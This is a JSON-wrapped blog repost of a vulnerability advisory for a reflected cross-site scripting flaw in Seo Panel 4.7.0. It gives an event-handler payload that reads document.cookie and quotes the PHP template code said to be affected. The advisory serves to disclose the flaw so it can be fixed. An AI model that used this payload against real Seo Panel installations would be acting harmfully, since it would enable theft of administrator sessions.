{"id":56111,"date":"2024-04-06T00:41:18","date_gmt":"2024-04-05T20:41:18","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177947\/seopanel470-xss.txt"},"modified":"2024-04-06T00:41:18","modified_gmt":"2024-04-05T20:41:18","slug":"seo-panel-4-7-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/seo-panel-4-7-0-cross-site-scripting\/","title":{"rendered":"Seo Panel 4.7.0 Cross Site Scripting"},"content":{"rendered":"

# Exploit Title: Seo Panel 4.7.0 Reflected XSS
# Exploit Author: Arzu DEM\u00ddREZ
# Date: 05.03-2024
# Vendor Homepage: https:\/\/www.seopanel.org\/
# Software Link: https:\/\/github.com\/seopanel\/Seo-Panel\/releases\/tag\/4.7.0
# Version: Seo Panel 4.7.0<\/p>\n

-Description:
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript.<\/p>\n

– used:
x” onmouseover=alert(document.cookie) x=”<\/p>\n

Review Of Analysis:
\u00ddn archive.ctp.php file include search_form and search_name input load on that script at line 71 as
<a href=”javascript:void(0);” onclick=”scriptDoLoadPost(‘archive.php’, ‘search_form’, ‘content’)” class=”actionbut”><?php echo $spText[‘button’][‘Search’]?><\/a>
because of that an attacker if send that code
x” onmouseover=alert(document.cookie) x=”
can exploit the victim.<\/p>\n

<form id=’search_form’>
<table width=”100%” class=”search”>
<tr>
<th><?php echo $spText[‘common’][‘Name’]?>: <\/th>
<td>
<input type=”text” name=”search_name” value=”<?php echo htmlentities($searchInfo[‘search_name’], ENT_QUOTES)?>” onblur=”<?php echo $submitLink?>”>
<\/td>
<th><?php echo $spText[‘common’][‘Period’]?>:<\/th>
<td colspan=”2″>
<input type=”text” value=”<?php echo $fromTime?>” name=”from_time” id=”from_time_summary”\/>
<input type=”text” value=”<?php echo $toTime?>” name=”to_time” id=”to_time_summary”\/>
<script>
$( function() {
$( “#from_time_summary, #to_time_summary”).datepicker({dateFormat: “yy-mm-dd”});
} );
<\/script>
<\/td>
<tr>
<tr>
<th><?php echo $spText[‘common’][‘Website’]?>: <\/th>
<td>
<select name=”website_id” id=”website_id” onchange=”scriptDoLoadPost(‘archive.php’, ‘search_form’, ‘content’)” style=”width: 180px;”>
<option value=””>– <?php echo $spText[‘common’][‘Select’]?> –<\/option>
<?php foreach($siteList as $websiteInfo){?>
<?php if($websiteInfo[‘id’] == $websiteId){?>
<option value=”<?php echo $websiteInfo[‘id’]?>” selected><?php echo $websiteInfo[‘name’]?><\/option>
<?php }else{?>
<option value=”<?php echo $websiteInfo[‘id’]?>”><?php echo $websiteInfo[‘name’]?><\/option>
<?php }?>
<?php }?>
<\/select>
<\/td>
<th><?php echo $spText[‘label’][‘Report Type’]?>: <\/th>
<td>
<select name=”report_type” id=”report_type” onchange=”scriptDoLoadPost(‘archive.php’, ‘search_form’, ‘content’)” style=”width: 210px;”>
<option value=””>– <?php echo $spText[‘common’][‘Select’]?> –<\/option>
<?php foreach($reportTypes as $type => $info){?>
<?php if($type == $searchInfo[‘report_type’]){?>
<option value=”<?php echo $type?>” selected><?php echo $info?><\/option>
<?php }else{?>
<option value=”<?php echo $type?>”><?php echo $info?><\/option>
<?php }?>
<?php }?>
<\/select>
<a href=”javascript:void(0);” onclick=”scriptDoLoadPost(‘archive.php’, ‘search_form’, ‘content’)” class=”actionbut”><?php echo $spText[‘button’][‘Search’]?><\/a><\/p>\n

Sayg\u00fdlar\u00fdmla \/ Best Regards,<\/p>\n[cid:e33e203c-58cd-46ba-b1ea-f27e999dc68d]\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Seo Panel 4.7.0 Reflected XSS# Exploit Author: Arzu DEM\u00ddREZ# Date: 05.03-2024# Vendor Homepage: https:\/\/www.seopanel.org\/# Software Link: https:\/\/github.com\/seopanel\/Seo-Panel\/releases\/tag\/4.7.0# Version: Seo Panel 4.7.0 -Description:A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript. – used:x” onmouseover=alert(document.cookie) x=” Review Of Analysis:\u00ddn archive.ctp.php file include search_form and …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56111","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56111","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56111"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56111\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56111"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56111"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56111"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}